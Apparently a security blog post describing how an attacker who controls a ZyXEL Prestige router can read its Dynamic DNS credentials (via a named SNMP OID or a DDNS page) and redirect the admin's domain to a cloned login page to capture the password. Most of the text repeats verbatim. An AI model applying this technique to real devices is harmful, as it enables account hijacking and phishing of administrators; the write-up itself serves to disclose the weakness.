Capturing admin passwords of embedded devices via Dynamic DNS poisoning
Sometimes, when an embedded device such as a DSL home router is compromised (i.e.: via an authentication bypass vulnerability), the attacker will attempt to extract the administrator's password. This might be possible by saving a backup of the configuration file (i.e.: via the web management console)and looking at the contents. Occasionally, the admin password can be found in the HTML source code within pages of the device's web interface (sometimes "hidden" as a type="password" parameter which can still be read in the source code). A third possibility is the admin password being accessed via SNMP read access.
However, what happens if these techniques fail to work? Well, there is another technique that the attacker could use to steal the admin password. The only requirement is that the administrator must connect to the target device via a Dynamic DNS domain name at some point in time. The idea is that the attacker launches a phishing attack against the admin user via Dynamic DNS poisoning.
Similar to traditional DNS poisoning attacks, dynamic DNS poisoning attacks cause a domain name requested by the victim, resolve to an IP address controlled by the attacker. Such an attack could be used for many reasons such as exploiting the user’s browser in order to install malware or launching a phishing attack.
However, there is a difference between classic DNS poisoning attacks and Dynamic DNS poisoning attacks on embedded devices: the attacker doesn't need to attack the DNS servers in charge of the target domain directly. Instead, the attacker compromises the DDNS service's account that handles the target domain name.
For instance, there are at least two ways to compromise the Dynamic DNS service account in charge of managing the domain used to manage ZyXEL Prestige routers remotely.
The first method is to snmpwalk the OID 1.3.6.1.4.1.890.1.2.1.2 using the read SNMP community string. The second method consists of accessing the DDNS page (/rpDyDNS.html). Note: you might want to check out our ZyXEL routers security paper for more info.
Either method would provide the attacker with the credentials necessary to hijack the admin user's Dynamic DNS account at www.dyndns.com. At this point, the attacker can make the domain name used by the administrator to connect to the ZyXEL router remotely (i.e.: zyxel01.company.dyndns.org) resolve to any IP address of his/her choice. By resolving to the IP address of a web server that returns a login page identical to the ZyXEL router's login page, the attacker can capture the password of the admin account successfully as soon as the admin user logs in.
However, what happens if these techniques fail to work? Well, there is another technique that the attacker could use to steal the admin password. The only requirement is that the administrator must connect to the target device via a Dynamic DNS domain name at some point in time. The idea is that the attacker launches a phishing attack against the admin user via Dynamic DNS poisoning.
Similar to traditional DNS poisoning attacks, dynamic DNS poisoning attacks cause a domain name requested by the victim, resolve to an IP address controlled by the attacker. Such an attack could be used for many reasons such as exploiting the user’s browser in order to install malware or launching a phishing attack.
However, there is a difference between classic DNS poisoning attacks and Dynamic DNS poisoning attacks on embedded devices: the attacker doesn't need to attack the DNS servers in charge of the target domain directly. Instead, the attacker compromises the DDNS service's account that handles the target domain name.
For instance, there are at least two ways to compromise the Dynamic DNS service account in charge of managing the domain used to manage ZyXEL Prestige routers remotely.
The first method is to snmpwalk the OID 1.3.6.1.4.1.890.1.2.1.2 using the read SNMP community string. The second method consists of accessing the DDNS page (/rpDyDNS.html). Note: you might want to check out our ZyXEL routers security paper for more info.
Either method would provide the attacker with the credentials necessary to hijack the admin user's Dynamic DNS account at www.dyndns.com. At this point, the attacker can make the domain name used by the administrator to connect to the ZyXEL router remotely (i.e.: zyxel01.company.dyndns.org) resolve to any IP address of his/her choice. By resolving to the IP address of a web server that returns a login page identical to the ZyXEL router's login page, the attacker can capture the password of the admin account successfully as soon as the admin user logs in.
0 Comments:
Post a Comment
<< Home